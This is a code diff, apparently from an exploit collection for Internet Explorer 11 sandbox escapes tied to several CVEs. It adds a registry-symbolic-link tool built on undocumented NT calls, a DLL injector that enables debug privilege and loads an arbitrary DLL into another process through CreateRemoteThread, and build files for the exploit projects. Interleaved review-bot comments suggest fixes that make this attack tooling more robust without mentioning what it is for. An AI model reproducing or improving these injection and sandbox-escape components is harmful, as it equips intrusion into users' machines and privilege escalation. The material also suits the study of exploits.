HANDLE hdl_nt_keyhandle;
|
||||
UNICODE_STRING nt_keyname, nt_valuename;
|
||||
OBJECT_ATTRIBUTES nt_object_attributes;
|
||||
|
||||
ntapi_init();
|
||||
|
||||
nt_keyname.Buffer = par_src;
|
||||
nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
|
||||
|
||||
nt_object_attributes.ObjectName = &nt_keyname;
|
||||
nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE;
|
||||
nt_object_attributes.RootDirectory = NULL; //
|
||||
nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type
|
||||
nt_object_attributes.SecurityQualityOfService = NULL; //
|
||||
nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
|
||||
|
||||
// create the key
|
||||
if (opt_volatile)
|
||||
status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
|
||||
else
|
||||
status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
|
||||
|
||||
if (status == 0) {
|
||||
DebugPrintf("DEBUG: Key %ls created successfully.\n", par_src);
|
||||
|
||||
// the real action is here:
|
||||
|
||||
nt_valuename.Buffer = REG_LINK_VALUE_NAME;
|
||||
nt_valuename.Length = wcslen(REG_LINK_VALUE_NAME) * sizeof(WCHAR);
|
||||
|
||||
status = NtSetValueKey(hdl_nt_keyhandle, &nt_valuename, 0, REG_LINK, par_dst, wcslen(par_dst) * sizeof(WCHAR));
|
||||
|
||||
if (status == 0) {
|
||||
DebugPrintf("DEBUG: Value REG_LINK:%ls=%ls set succesfully.\n", REG_LINK_VALUE_NAME, par_dst);
|
||||
}
|
||||
else {
|
||||
DebugPrintf("ERROR: Link creation failed. [Step 2] [Error %08X]\n", status);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
else {
|
||||
DebugPrintf("ERROR: Link creation failed. [Step 1] [Error %08X]\n", status);
|
||||
return 1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
int ntapi_init(void) {
|
||||
#ifdef DEBUG
|
||||
DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtCreateKey...\n");
|
||||
#endif
|
||||
if(!(NtCreateKey = (fNtCreateKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateKey" ))) {
|
||||
DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
|
||||
return 1;
|
||||
}
|
||||
#ifdef DEBUG
|
||||
DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtDeleteKey...\n");
|
||||
#endif
|
||||
if(!(NtDeleteKey = (fNtDeleteKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtDeleteKey" ))) {
|
||||
DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
|
||||
return 1;
|
||||
}
|
||||
#ifdef DEBUG
|
||||
DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtSetValueKey...\n");
|
||||
#endif
|
||||
if(!(NtSetValueKey = (fNtSetValueKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtSetValueKey" ))) {
|
||||
DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
|
||||
return 1;
|
||||
}
|
||||
return 0;
|
||||
}
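Review bot: Both `DeleteLink` and `CreateLink` call `ntapi_init()` and discard its result, so if any `GetProcAddress` lookup fails the following `NtCreateKey(...)` call goes through a NULL function pointer; use `if (ntapi_init() != 0) return 1;` in both. The `UNICODE_STRING` handed to the kernel is only partly initialized, as `MaximumLength` is never assigned for `nt_keyname` or `nt_valuename`; adding `nt_keyname.MaximumLength = nt_keyname.Length;` (and the equivalent for `nt_valuename`) after each `Length` assignment closes that gap. `hdl_nt_keyhandle` is also never closed on any path, so each successful `NtCreateKey` leaks a kernel handle; `CloseHandle(hdl_nt_keyhandle);` before each return once the handle was obtained fixes it. Note too that `wcslen(...) * sizeof(WCHAR)` is narrowed into the 16-bit `Length` field without a range check, which only matters for very long key paths but is worth a comment.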
|
||||
|
|
@ -0,0 +1,70 @@
|
|||
/*--------------------------------------------------------------------
|
||||
REGLN - Manage Windows Rregistry Links V20R0
|
||||
======================================================================
|
||||
Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
|
||||
|
||||
The following Copyrights apply:
|
||||
|
||||
Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net>
|
||||
Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
|
||||
Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com>
|
||||
|
||||
License:
|
||||
|
||||
This software is distributed under the terms and conditions of
|
||||
GPL - GNU General Public License. The software is provided AS
|
||||
IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no
|
||||
responsibility for any damages or consequences of usage of this
|
||||
software. For more information, please read the attached GPL.TXT.
|
||||
|
||||
--------------------------------------------------------------------*/
|
||||
|
||||
|
||||
|
||||
#define REG_LINK_VALUE_NAME L"SymbolicLinkValue" // found by tenox
|
||||
//#define REG_OPTION_CREATE_LINK 2 // this is defined in MSVC 2.0 but not after
|
||||
#define REG_OPTION_OPEN_LINK_ATTR 0x100 // found by tommy
|
||||
#define OBJ_CASE_INSENSITIVE 0x40
|
||||
|
||||
//
|
||||
// Following definitions are generously provided by Mark Russinovitch
|
||||
//
|
||||
typedef struct _UNICODE_STRING {
|
||||
WORD Length;
|
||||
WORD MaximumLength;
|
||||
PCWSTR Buffer;
|
||||
} UNICODE_STRING;
|
||||
typedef UNICODE_STRING *PUNICODE_STRING;
|
||||
|
||||
typedef struct _OBJECT_ATTRIBUTES {
|
||||
DWORD Length;
|
||||
HANDLE RootDirectory;
|
||||
PUNICODE_STRING ObjectName;
|
||||
DWORD Attributes;
|
||||
PVOID SecurityDescriptor;
|
||||
PVOID SecurityQualityOfService;
|
||||
} OBJECT_ATTRIBUTES;
|
||||
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
|
||||
|
||||
typedef DWORD (__stdcall *fNtCreateKey)(
|
||||
HANDLE KeyHandle,
|
||||
DWORD DesiredAccess,
|
||||
POBJECT_ATTRIBUTES ObjectAttributes,
|
||||
DWORD TitleIndex,
|
||||
PUNICODE_STRING Class,
|
||||
DWORD CreateOptions,
|
||||
PDWORD Disposition
|
||||
);
|
||||
|
||||
typedef DWORD (__stdcall *fNtSetValueKey)(
|
||||
HANDLE KeyHandle,
|
||||
PUNICODE_STRING ValueName,
|
||||
DWORD TitleIndex,
|
||||
DWORD Type,
|
||||
const void* Data,
|
||||
DWORD DataSize
|
||||
);
|
||||
|
||||
typedef DWORD (__stdcall *fNtDeleteKey)(
|
||||
HANDLE KeyHandle
|
||||
);
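Review bot: The `fNtCreateKey` typedef declares its first parameter as `HANDLE KeyHandle`, but the native NtCreateKey takes an output handle pointer, and regln.c in this commit passes `&hdl_nt_keyhandle`; this only compiles because C tolerates the pointer mismatch with a warning, and it would be a hard error if the file were ever built as C++. Change it to `PHANDLE KeyHandle,` and, ideally, declare the return type of all three typedefs as `LONG` (NTSTATUS) rather than `DWORD` so callers can test `status < 0` instead of relying on `== 0`. The header also redefines `OBJ_CASE_INSENSITIVE` and defines `REG_OPTION_OPEN_LINK_ATTR` and `REG_LINK_VALUE_NAME` with only "found by" attributions; a comment noting that these appear to mirror the SDK's `OBJ_CASE_INSENSITIVE` and `OBJ_OPENLINK` attribute values would make the intent clear to the next reader.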
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// CommandUtils.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,15 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <tchar.h>
|
||||
#include <Windows.h>
|
||||
#include <strsafe.h>
|
||||
#include <vector>
|
||||
#include <string>
|
||||
#include <sstream>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
|
@ -0,0 +1,72 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio 2013
|
||||
VisualStudioVersion = 12.0.30501.0
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectDll", "InjectDll\InjectDll.vcxproj", "{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5045", "CVE-2013-5045\CVE-2013-5045.vcxproj", "{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CommonUtils", "CommonUtils\CommonUtils.vcxproj", "{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5046", "CVE-2013-5046\CVE-2013-5046.vcxproj", "{7A9AC14A-00BC-4A69-9B86-C80635606FEA}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0268", "CVE-2014-0268\CVE-2014-0268.vcxproj", "{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0257", "CVE-2014-0257\CVE-2014-0257.vcxproj", "{2A46841E-E3FC-42FF-BCDF-70F76E757E26}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Win32 = Debug|Win32
|
||||
Debug|x64 = Debug|x64
|
||||
Release|Win32 = Release|Win32
|
||||
Release|x64 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.Build.0 = Debug|x64
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.ActiveCfg = Release|x64
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.Build.0 = Release|x64
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.Build.0 = Debug|x64
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.Build.0 = Release|Win32
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.ActiveCfg = Release|x64
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.Build.0 = Release|x64
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.Build.0 = Debug|x64
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.Build.0 = Release|Win32
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.ActiveCfg = Release|x64
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.Build.0 = Release|x64
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.Build.0 = Debug|x64
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.ActiveCfg = Release|x64
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.Build.0 = Release|x64
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.Build.0 = Debug|x64
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.ActiveCfg = Release|x64
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.Build.0 = Release|x64
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.Build.0 = Debug|x64
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.Build.0 = Release|Win32
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.ActiveCfg = Release|x64
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.Build.0 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,107 @@
|
|||
// This file is part of IE11SandboxEsacapes.
|
||||
|
||||
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License as published by
|
||||
// the Free Software Foundation, either version 3 of the License, or
|
||||
// (at your option) any later version.
|
||||
|
||||
// IE11SandboxEscapes is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
|
||||
// You should have received a copy of the GNU General Public License
|
||||
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
|
||||
{
|
||||
TOKEN_PRIVILEGES tp;
|
||||
LUID luid;
|
||||
|
||||
if(!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
|
||||
{
|
||||
printf("Error 1 %d\n", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
tp.PrivilegeCount = 1;
|
||||
tp.Privileges[0].Luid = luid;
|
||||
if(bEnablePrivilege)
|
||||
{
|
||||
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
}
|
||||
else
|
||||
{
|
||||
tp.Privileges[0].Attributes = 0;
|
||||
}
|
||||
|
||||
if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
|
||||
{
|
||||
printf("Error adjusting privilege %d\n", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
if(GetLastError() == ERROR_NOT_ALL_ASSIGNED)
|
||||
{
|
||||
printf("Not all privilges available\n");
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
|
||||
int _tmain(int argc, _TCHAR* argv[])
|
||||
{
|
||||
if(argc < 3)
|
||||
{
|
||||
printf("Usage: InjectDll pid PathToDll\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
WCHAR path[MAX_PATH];
|
||||
|
||||
GetFullPathName(argv[2], MAX_PATH, path, nullptr);
|
||||
int pid = wcstoul(argv[1], 0, 0);
|
||||
|
||||
printf("Injecting DLL: %ls into PID: %d\n", path, pid);
|
||||
|
||||
HANDLE hToken;
|
||||
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
|
||||
|
||||
SetPrivilege(hToken, SE_DEBUG_NAME, TRUE);
|
||||
|
||||
HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, pid);
|
||||
if(hProcess)
|
||||
{
|
||||
size_t strSize = (wcslen(path) + 1) * sizeof(WCHAR);
|
||||
LPVOID pBuf = VirtualAllocEx(hProcess, 0, strSize, MEM_COMMIT, PAGE_READWRITE);
|
||||
if(pBuf == NULL)
|
||||
{
|
||||
printf("Couldn't allocate memory in process\n");
|
||||
return 1;
|
||||
}
|
||||
SIZE_T written;
|
||||
if (!WriteProcessMemory(hProcess, pBuf, path, strSize, &written))
|
||||
{
|
||||
printf("Couldn't write to process memory\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
LPVOID pLoadLibraryW = GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW");
|
||||
|
||||
if(!CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibraryW, pBuf, 0, NULL))
|
||||
{
|
||||
printf("Couldn't create remote thread %d\n", GetLastError());
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("Couldn't open process %d\n", GetLastError());
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
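Review bot: The return value of `OpenProcessToken` near the top of `_tmain` is ignored, so when it fails `hToken` is an uninitialized HANDLE that is passed straight into `SetPrivilege`/`AdjustTokenPrivileges`, and `SetPrivilege`'s own FALSE return is dropped as well, so a later `OpenProcess` failure message hides the real cause; I would guard it with `if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) { printf("Couldn't open own token %lu\n", GetLastError()); return 1; }` and return when `SetPrivilege` reports failure. `GetFullPathName` is likewise unchecked, so a bad `argv[2]` leaves `path` uninitialized before it is copied into the target process. None of `hToken`, `hProcess`, the thread handle returned by `CreateRemoteThread`, or the remote `pBuf` allocation are released on any path (`CloseHandle`/`VirtualFreeEx`), and each `return 1` inside the `if(hProcess)` block leaks them too; for a one-shot helper that is tolerable but deserves a comment saying so. The `printf` calls format `GetLastError()` (a DWORD) with `%d`; `%lu` is the matching specifier, here and in `SetPrivilege` above it in the same hunk.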
155
external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj
155
external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj
|
@ -0,0 +1,155 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>InjectDll</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="InjectDll.cpp" />
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,8 @@
|
